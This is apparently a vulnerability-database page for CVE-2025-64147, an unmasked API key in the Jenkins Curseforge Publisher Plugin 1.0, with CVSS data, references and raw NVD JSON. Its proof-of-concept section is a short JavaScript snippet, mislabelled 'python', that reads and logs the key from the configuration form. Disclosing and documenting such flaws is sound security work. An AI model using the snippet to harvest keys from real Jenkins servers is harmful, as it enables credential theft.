CVE-2025-64147

Description

Jenkins Curseforge Publisher Plugin 1.0 does not mask API Keys displayed on the job configuration form, increasing the potential for attackers to observe and capture them.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:curseforge_publisher:1.0:*:*:*:*:jenkins:*:* - VULNERABLE

Jenkins Curseforge Publisher Plugin 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-64147 PoC - Information Disclosure via Page Inspection
// Steps to reproduce:
// 1. Navigate to Jenkins job configuration page
// 2. Locate the Curseforge Publisher section
// 3. Inspect the API Key input field in browser dev tools
// 4. The API key will be visible as plaintext in the 'value' attribute

// Example JavaScript to extract the API key:
(function() {
    var apiKeyInput = document.querySelector('input[name="_.apiKey"]');
    if (apiKeyInput) {
        console.log('Exposed API Key:', apiKeyInput.value);
        return apiKeyInput.value;
    }
})();

// Or simply view page source to find:
// <input type="text" name="_.apiKey" value="ACTUAL_API_KEY_HERE" />
// Instead of masked:
// <input type="password" name="_.apiKey" value="ACTUAL_API_KEY_HERE" />

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64147
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64147
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64147/
[4] VulDB https://vuldb.com/cve/CVE-2025-64147
[5] https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3562
[6] http://www.openwall.com/lists/oss-security/2025/10/29/2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64147", "sourceIdentifier": "[email protected]", "published": "2025-10-29T14:15:59.553", "lastModified": "2025-11-04T22:16:41.597", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Jenkins Curseforge Publisher Plugin 1.0 does not mask API Keys displayed on the job configuration form, increasing the potential for attackers to observe and capture them."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-311"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jenkins:curseforge_publisher:1.0:*:*:*:*:jenkins:*:*", "matchCriteriaId": "5AA75189-8898-4173-87E5-818B6D713C95"}]}]}], "references": [{"url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3562", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}